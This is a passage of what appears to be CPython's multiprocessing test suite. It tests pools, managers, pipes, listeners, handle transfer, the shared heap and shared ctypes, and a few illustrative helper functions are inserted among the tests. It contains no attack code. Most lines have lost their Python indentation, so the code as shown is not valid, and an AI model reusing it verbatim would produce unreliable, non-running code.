self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
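# Illustrative sketch (added for clarity, never called by the tests): how
# apply_async() hands a worker's exception to error_callback while get()
# re-raises it, as test_async_error_callback below checks. It reuses the
# module-level raising() helper; the ``_demo_pool_error_callback`` name is an
# assumption introduced here for illustration only.
def _demo_pool_error_callback():
    import multiprocessing
    seen = []
    with multiprocessing.Pool(1) as pool:
        result = pool.apply_async(raising, error_callback=seen.append)
        try:
            result.get(timeout=10)
        except KeyError:
            pass          # the worker's KeyError is re-raised by get()
    return seen           # the same KeyError instance is also passed to the callback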
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
        # tests the cases from bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
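# Illustrative sketch (added for clarity, never called by the tests): using the
# customized manager registered above -- the manager process instantiates
# FooBar and the caller works through a proxy, as _TestMyManager.common()
# demonstrates. The ``_demo_custom_manager`` name is an assumption introduced
# here for illustration only.
def _demo_custom_manager():
    with MyManager() as manager:
        foo = manager.Foo()    # proxy for a FooBar instance living in the manager process
        return foo.f()         # 'f()' returned across the proxy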
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
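# Illustrative sketch (added for clarity, never called by the tests): connecting
# a second manager to an already running QueueManager server and obtaining its
# shared queue proxy, as _TestRemoteManager._putter below does. The
# ``_demo_remote_queue_client`` name is an assumption introduced here for
# illustration only; address and authkey must come from the running server.
def _demo_remote_queue_client(address, authkey):
    client = QueueManager2(address=address, authkey=authkey,
                           serializer=SERIALIZER)
    client.connect()               # attach to the existing server; does not start a new one
    return client.get_queue()      # proxy for the queue exported by the server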
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
        # Note that xmlrpclib will deserialize the tuple as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
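# Illustrative sketch (added for clarity, never called by the tests): the
# sentinel-terminated echo pattern used by _TestConnection._echo below --
# iter(recv_bytes, SENTINEL) keeps reading until the empty sentinel arrives.
# The ``_demo_pipe_sentinel`` name is an assumption introduced here for
# illustration only.
def _demo_pipe_sentinel():
    import multiprocessing
    a, b = multiprocessing.Pipe()
    a.send_bytes(b'ping')
    a.send_bytes(SENTINEL)                          # empty message marks the end of the stream
    received = list(iter(b.recv_bytes, SENTINEL))   # [b'ping']
    a.close()
    b.close()
    return received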
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)   # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
        # We test that a pipe connection can be closed by the parent
        # process immediately after the child is spawned. On Windows
        # this sometimes failed on old versions because child_conn
        # would be closed before the child got a chance to duplicate
        # it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle. This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
        # 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
        # correct access flags for DuplicateHandle(), or else
        # DupHandle.detach() will raise PermissionError. For example,
        # for a read-only pipe handle we should use
        # access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
        # test freeing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
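# Illustrative sketch (added for clarity, never called by the tests): a shared
# ctypes Structure wrapped by multiprocessing.sharedctypes.Value, mirroring the
# _Foo usage in _TestSharedCTypes below. Assumes _ctypes is available
# (HAS_SHAREDCTYPES); the ``_demo_sharedctypes_struct`` name is an assumption
# introduced here for illustration only.
def _demo_sharedctypes_struct():
    from multiprocessing.sharedctypes import Value
    foo = Value(_Foo, 3, 2)    # synchronized wrapper; field access is lock-protected
    foo.x *= 2
    return foo.x, foo.y        # (6, 2.0)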
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
